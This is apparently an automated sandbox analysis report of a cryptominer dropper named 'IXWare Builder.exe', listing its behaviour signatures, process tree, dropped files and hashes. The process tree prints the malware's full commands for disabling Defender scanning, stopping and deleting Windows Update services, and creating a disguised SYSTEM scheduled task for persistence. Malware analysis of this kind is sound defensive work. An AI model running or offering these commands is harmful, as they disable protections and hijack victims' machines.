Analysis

  • max time kernel
    78s
  • max time network
    82s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    03/02/2023, 22:11

General

  • Target

    IXWare Builder.exe

  • Size

    3.6MB

  • MD5

    6a292b8ab3ff79cefe5f8e42882885d2

  • SHA1

    cd1c59c618cb2f9d906f7214b803dd711f104f27

  • SHA256

    05e1988f56fe199f7e401c8f4d6ee50bb26ab34fb3f96c22de959c7e5f92de77

  • SHA512

    8288878d032221043d3bf99d78011aaab7ee744aeda4c2429cc461d34f7bffd9e091f242ca5fab84a6874e443420f436efc4367f1c776c74e0081f47418e1bab

  • SSDEEP

    49152:NNn9hglTk53CXPgmsyL1dvIcfYNGRaKDFCC2PPGshxSZjUni1h2/MgNRIfxi3vyf:Nd9hCcigVyLPIcRaesSZy9hAx0vyq

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 1 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 34 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 39 IoCs
  • Suspicious use of FindShellTrayWindow 51 IoCs
  • Suspicious use of SendNotifyMessage 48 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1212
      • C:\Users\Admin\AppData\Local\Temp\IXWare Builder.exe
        "C:\Users\Admin\AppData\Local\Temp\IXWare Builder.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1380
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        2⤵
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1232
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fefacb4f50,0x7fefacb4f60,0x7fefacb4f70
          3⤵
            PID:544
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1048,14570077798368596704,927775596769934090,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1116 /prefetch:2
            3⤵
              PID:1996
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1048,14570077798368596704,927775596769934090,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1404 /prefetch:8
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:1640
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1048,14570077798368596704,927775596769934090,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1716 /prefetch:8
              3⤵
                PID:1992
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1048,14570077798368596704,927775596769934090,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2132 /prefetch:1
                3⤵
                  PID:1520
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1048,14570077798368596704,927775596769934090,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2020 /prefetch:1
                  3⤵
                    PID:1240
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1048,14570077798368596704,927775596769934090,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:8
                    3⤵
                      PID:1020
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1048,14570077798368596704,927775596769934090,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3272 /prefetch:2
                      3⤵
                        PID:1276
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1048,14570077798368596704,927775596769934090,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
                        3⤵
                          PID:2000
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1048,14570077798368596704,927775596769934090,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3460 /prefetch:8
                          3⤵
                            PID:2060
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1048,14570077798368596704,927775596769934090,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3604 /prefetch:8
                            3⤵
                              PID:2068
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                            2⤵
                            • Drops file in System32 directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:992
                          • C:\Windows\System32\cmd.exe
                            C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                            2⤵
                              PID:1188
                              • C:\Windows\System32\sc.exe
                                sc stop UsoSvc
                                3⤵
                                • Launches sc.exe
                                PID:1020
                              • C:\Windows\System32\sc.exe
                                sc stop WaaSMedicSvc
                                3⤵
                                • Launches sc.exe
                                PID:1896
                              • C:\Windows\System32\sc.exe
                                sc stop wuauserv
                                3⤵
                                • Launches sc.exe
                                PID:1652
                              • C:\Windows\System32\sc.exe
                                sc stop bits
                                3⤵
                                • Launches sc.exe
                                PID:912
                              • C:\Windows\System32\sc.exe
                                sc stop dosvc
                                3⤵
                                • Launches sc.exe
                                PID:1896
                              • C:\Windows\System32\reg.exe
                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                3⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1916
                              • C:\Windows\System32\reg.exe
                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                3⤵
                                  PID:964
                                • C:\Windows\System32\reg.exe
                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                  3⤵
                                  • Modifies security service
                                  PID:1920
                                • C:\Windows\System32\reg.exe
                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                  3⤵
                                    PID:1976
                                  • C:\Windows\System32\reg.exe
                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                    3⤵
                                      PID:1616
                                  • C:\Windows\System32\cmd.exe
                                    C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                    2⤵
                                      PID:1064
                                      • C:\Windows\System32\powercfg.exe
                                        powercfg /x -hibernate-timeout-ac 0
                                        3⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1976
                                      • C:\Windows\System32\powercfg.exe
                                        powercfg /x -hibernate-timeout-dc 0
                                        3⤵
                                          PID:1516
                                        • C:\Windows\System32\powercfg.exe
                                          powercfg /x -standby-timeout-ac 0
                                          3⤵
                                            PID:1916
                                          • C:\Windows\System32\powercfg.exe
                                            powercfg /x -standby-timeout-dc 0
                                            3⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1516
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xwrxi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                          2⤵
                                          • Drops file in System32 directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1852
                                          • C:\Windows\system32\schtasks.exe
                                            "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                                            3⤵
                                            • Creates scheduled task(s)
                                            PID:1652
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wnaflx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                                          2⤵
                                          • Drops file in System32 directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1888
                                          • C:\Windows\system32\schtasks.exe
                                            "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                                            3⤵
                                              PID:1344
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                            2⤵
                                            • Drops file in System32 directory
                                            • Modifies data under HKEY_USERS
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2152
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xwrxi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                            2⤵
                                            • Drops file in System32 directory
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2248
                                            • C:\Windows\system32\schtasks.exe
                                              "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                                              3⤵
                                              • Creates scheduled task(s)
                                              PID:2476
                                          • C:\Windows\System32\cmd.exe
                                            C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                            2⤵
                                              PID:2240
                                              • C:\Windows\System32\powercfg.exe
                                                powercfg /x -hibernate-timeout-ac 0
                                                3⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2452
                                              • C:\Windows\System32\powercfg.exe
                                                powercfg /x -hibernate-timeout-dc 0
                                                3⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2488
                                              • C:\Windows\System32\powercfg.exe
                                                powercfg /x -standby-timeout-ac 0
                                                3⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2516
                                              • C:\Windows\System32\powercfg.exe
                                                powercfg /x -standby-timeout-dc 0
                                                3⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2544
                                            • C:\Windows\System32\cmd.exe
                                              C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                              2⤵
                                                PID:2224
                                                • C:\Windows\System32\sc.exe
                                                  sc stop wuauserv
                                                  3⤵
                                                  • Launches sc.exe
                                                  PID:2332
                                                • C:\Windows\System32\sc.exe
                                                  sc stop WaaSMedicSvc
                                                  3⤵
                                                  • Launches sc.exe
                                                  PID:2296
                                                • C:\Windows\System32\sc.exe
                                                  sc stop bits
                                                  3⤵
                                                  • Launches sc.exe
                                                  PID:2360
                                                • C:\Windows\System32\reg.exe
                                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                  3⤵
                                                    PID:2396
                                                  • C:\Windows\System32\sc.exe
                                                    sc stop dosvc
                                                    3⤵
                                                    • Launches sc.exe
                                                    PID:2380
                                                  • C:\Windows\System32\reg.exe
                                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                    3⤵
                                                      PID:2500
                                                    • C:\Windows\System32\reg.exe
                                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                      3⤵
                                                        PID:2464
                                                      • C:\Windows\System32\reg.exe
                                                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                        3⤵
                                                          PID:2432
                                                        • C:\Windows\System32\reg.exe
                                                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                          3⤵
                                                            PID:2412
                                                        • C:\Windows\System32\conhost.exe
                                                          C:\Windows\System32\conhost.exe zoddukej
                                                          2⤵
                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:2576
                                                        • C:\Windows\System32\cmd.exe
                                                          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                                          2⤵
                                                          • Drops file in Program Files directory
                                                          PID:2596
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic PATH Win32_VideoController GET Name, VideoProcessor
                                                            3⤵
                                                            • Modifies data under HKEY_USERS
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2628
                                                        • C:\Windows\System32\cmd.exe
                                                          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                                          2⤵
                                                          • Drops file in Program Files directory
                                                          PID:2588
                                                        • C:\Windows\System32\conhost.exe
                                                          C:\Windows\System32\conhost.exe wjrwcbmovqiivvza 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUCyenD17wVidCED2c5Gn+a5qb+/g0b3Ur/C+iD8np6iZx06YTYzBsIDEVu0Wrk2UwuukEEjoUiiBrd9zyymwiBSMVOfeOLmGu4+IwFI7kPtb18fD92KUF+SD6W131UXXDPzDPXArhJ13MzguF0yZn/suwtDdWS9oN7NCgbeCMVEp8iLR7Tn83acj4j1k1I4EKYFs+BcFNYta25Zx0kstnjkPVvlAuPNq11iDNdVLx+huPbvoBtYNdzWxzGH9pLELi821y1t9B8CHFvXDYZkDrYcG0npYL9hV3ypJI8SxujXyy4M1ymvUFPc7gJnTamPL9nM77KCXRpQwbN4+Wo+gi4+OcyQnq5bhzCRdLHMUqoP/ZhAnfs857FDARbyjrLbW6euiNZzad8UdDxjql0Imtt1mQM4rXyXa0eHKIQhkOuFQROpv15rgMDlKU7X7vSF+gT/Igv05zsllYbZPPWD6DQ6+geZvpqiudNA9DB2QhGEmf1+uSdwiQKQruTX4crVGT
                                                          2⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2800
                                                      • C:\Windows\system32\taskeng.exe
                                                        taskeng.exe {037A7B8E-D417-47CC-8F4C-46304CB7BBEE} S-1-5-18:NT AUTHORITY\System:Service:
                                                        1⤵
                                                        • Loads dropped DLL
                                                        PID:992
                                                        • C:\Program Files\Google\Chrome\updater.exe
                                                          "C:\Program Files\Google\Chrome\updater.exe"
                                                          2⤵
                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                          • Drops file in Drivers directory
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          • Drops file in Program Files directory
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1504
                                                      • C:\Windows\System32\sc.exe
                                                        sc stop UsoSvc
                                                        1⤵
                                                        • Launches sc.exe
                                                        PID:2272
                                                      • C:\Windows\system32\LogonUI.exe
                                                        "LogonUI.exe" /flags:0x0
                                                        1⤵
                                                          PID:2748
                                                        • C:\Windows\system32\AUDIODG.EXE
                                                          C:\Windows\system32\AUDIODG.EXE 0x568
                                                          1⤵
                                                            PID:2888

                                                          Network

                                                                MITRE ATT&CK Enterprise v6

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • C:\Program Files\Google\Chrome\updater.exe

                                                                  Filesize

                                                                  3.6MB

                                                                  MD5

                                                                  6a292b8ab3ff79cefe5f8e42882885d2

                                                                  SHA1

                                                                  cd1c59c618cb2f9d906f7214b803dd711f104f27

                                                                  SHA256

                                                                  05e1988f56fe199f7e401c8f4d6ee50bb26ab34fb3f96c22de959c7e5f92de77

                                                                  SHA512

                                                                  8288878d032221043d3bf99d78011aaab7ee744aeda4c2429cc461d34f7bffd9e091f242ca5fab84a6874e443420f436efc4367f1c776c74e0081f47418e1bab

                                                                • C:\Program Files\Google\Chrome\updater.exe

                                                                  Filesize

                                                                  3.6MB

                                                                  MD5

                                                                  6a292b8ab3ff79cefe5f8e42882885d2

                                                                  SHA1

                                                                  cd1c59c618cb2f9d906f7214b803dd711f104f27

                                                                  SHA256

                                                                  05e1988f56fe199f7e401c8f4d6ee50bb26ab34fb3f96c22de959c7e5f92de77

                                                                  SHA512

                                                                  8288878d032221043d3bf99d78011aaab7ee744aeda4c2429cc461d34f7bffd9e091f242ca5fab84a6874e443420f436efc4367f1c776c74e0081f47418e1bab

                                                                • C:\Program Files\Google\Libs\g.log

                                                                  Filesize

                                                                  198B

                                                                  MD5

                                                                  37dd19b2be4fa7635ad6a2f3238c4af1

                                                                  SHA1

                                                                  e5b2c034636b434faee84e82e3bce3a3d3561943

                                                                  SHA256

                                                                  8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

                                                                  SHA512

                                                                  86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                  Filesize

                                                                  7KB

                                                                  MD5

                                                                  6857bed1f6a39e33bb8f4c9c36c455fa

                                                                  SHA1

                                                                  39fbb9dd76603e0ca9bf6f414ea3b183b80667e5

                                                                  SHA256

                                                                  af881ef9ba98136332539b3f604b310e80e4a62fc5d02ae23ae239b0ba690e02

                                                                  SHA512

                                                                  4330336ca460af6c9c00e31c0e3d1d9b9506480a04dc0dbd121bf47f00e9ffbd0d7fbcff95ea6df158287216575b2ea26b162e9846b46320bb3308b5f12e1c34

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                  Filesize

                                                                  7KB

                                                                  MD5

                                                                  6857bed1f6a39e33bb8f4c9c36c455fa

                                                                  SHA1

                                                                  39fbb9dd76603e0ca9bf6f414ea3b183b80667e5

                                                                  SHA256

                                                                  af881ef9ba98136332539b3f604b310e80e4a62fc5d02ae23ae239b0ba690e02

                                                                  SHA512

                                                                  4330336ca460af6c9c00e31c0e3d1d9b9506480a04dc0dbd121bf47f00e9ffbd0d7fbcff95ea6df158287216575b2ea26b162e9846b46320bb3308b5f12e1c34

                                                                • C:\Windows\system32\drivers\etc\hosts

                                                                  Filesize

                                                                  2KB

                                                                  MD5

                                                                  7b1d6a1e1228728a16b66c3714aa9a23

                                                                  SHA1

                                                                  8b59677a3560777593b1fa7d67465bbd7b3bc548

                                                                  SHA256

                                                                  3f15965d0159a818849134b3fbb016e858ac50efdf67bfcd762606ac51831bc5

                                                                  SHA512

                                                                  573b68c9865416ea2f9cf5c614fcedbfe69c67bd572bacec81c1756e711bd90fcfee93e17b74fb294756adf67ad18845a56c87f7f870940cbaeb3a579146a3b6

                                                                • C:\Windows\system32\drivers\etc\hosts

                                                                  Filesize

                                                                  2KB

                                                                  MD5

                                                                  7b1d6a1e1228728a16b66c3714aa9a23

                                                                  SHA1

                                                                  8b59677a3560777593b1fa7d67465bbd7b3bc548

                                                                  SHA256

                                                                  3f15965d0159a818849134b3fbb016e858ac50efdf67bfcd762606ac51831bc5

                                                                  SHA512

                                                                  573b68c9865416ea2f9cf5c614fcedbfe69c67bd572bacec81c1756e711bd90fcfee93e17b74fb294756adf67ad18845a56c87f7f870940cbaeb3a579146a3b6

                                                                • \Program Files\Google\Chrome\updater.exe

                                                                  Filesize

                                                                  3.6MB

                                                                  MD5

                                                                  6a292b8ab3ff79cefe5f8e42882885d2

                                                                  SHA1

                                                                  cd1c59c618cb2f9d906f7214b803dd711f104f27

                                                                  SHA256

                                                                  05e1988f56fe199f7e401c8f4d6ee50bb26ab34fb3f96c22de959c7e5f92de77

                                                                  SHA512

                                                                  8288878d032221043d3bf99d78011aaab7ee744aeda4c2429cc461d34f7bffd9e091f242ca5fab84a6874e443420f436efc4367f1c776c74e0081f47418e1bab

                                                                • memory/992-60-0x00000000027DB000-0x00000000027FA000-memory.dmp

                                                                  Filesize

                                                                  124KB

                                                                • memory/992-59-0x00000000027D4000-0x00000000027D7000-memory.dmp

                                                                  Filesize

                                                                  12KB

                                                                • memory/992-57-0x000007FEE51D0000-0x000007FEE5D2D000-memory.dmp

                                                                  Filesize

                                                                  11.4MB

                                                                • memory/992-58-0x00000000027D4000-0x00000000027D7000-memory.dmp

                                                                  Filesize

                                                                  12KB

                                                                • memory/992-56-0x000007FEF2AE0000-0x000007FEF3503000-memory.dmp

                                                                  Filesize

                                                                  10.1MB

                                                                • memory/992-55-0x000007FEFB8B1000-0x000007FEFB8B3000-memory.dmp

                                                                  Filesize

                                                                  8KB

                                                                • memory/1852-71-0x000007FEE4670000-0x000007FEE51CD000-memory.dmp

                                                                  Filesize

                                                                  11.4MB

                                                                • memory/1852-81-0x0000000002644000-0x0000000002647000-memory.dmp

                                                                  Filesize

                                                                  12KB

                                                                • memory/1852-82-0x000000000264B000-0x000000000266A000-memory.dmp

                                                                  Filesize

                                                                  124KB

                                                                • memory/1852-83-0x000000000264B000-0x000000000266A000-memory.dmp

                                                                  Filesize

                                                                  124KB

                                                                • memory/1852-68-0x000007FEF2A70000-0x000007FEF3493000-memory.dmp

                                                                  Filesize

                                                                  10.1MB

                                                                • memory/1888-93-0x000000000263B000-0x000000000265A000-memory.dmp

                                                                  Filesize

                                                                  124KB

                                                                • memory/1888-89-0x0000000002634000-0x0000000002637000-memory.dmp

                                                                  Filesize

                                                                  12KB

                                                                • memory/1888-88-0x000007FEE51D0000-0x000007FEE5D2D000-memory.dmp

                                                                  Filesize

                                                                  11.4MB

                                                                • memory/1888-90-0x000000000263B000-0x000000000265A000-memory.dmp

                                                                  Filesize

                                                                  124KB

                                                                • memory/1888-87-0x000007FEF2AE0000-0x000007FEF3503000-memory.dmp

                                                                  Filesize

                                                                  10.1MB

                                                                • memory/1888-92-0x0000000002634000-0x0000000002637000-memory.dmp

                                                                  Filesize

                                                                  12KB

                                                                • memory/2152-98-0x000007FEF34A0000-0x000007FEF3EC3000-memory.dmp

                                                                  Filesize

                                                                  10.1MB

                                                                • memory/2152-99-0x000007FEE4670000-0x000007FEE51CD000-memory.dmp

                                                                  Filesize

                                                                  11.4MB

                                                                • memory/2152-101-0x000000000115B000-0x000000000117A000-memory.dmp

                                                                  Filesize

                                                                  124KB

                                                                • memory/2152-100-0x0000000001154000-0x0000000001157000-memory.dmp

                                                                  Filesize

                                                                  12KB

                                                                • memory/2248-110-0x000007FEE51D0000-0x000007FEE5D2D000-memory.dmp

                                                                  Filesize

                                                                  11.4MB

                                                                • memory/2248-108-0x000007FEF3430000-0x000007FEF3E53000-memory.dmp

                                                                  Filesize

                                                                  10.1MB

                                                                • memory/2248-113-0x0000000001024000-0x0000000001027000-memory.dmp

                                                                  Filesize

                                                                  12KB

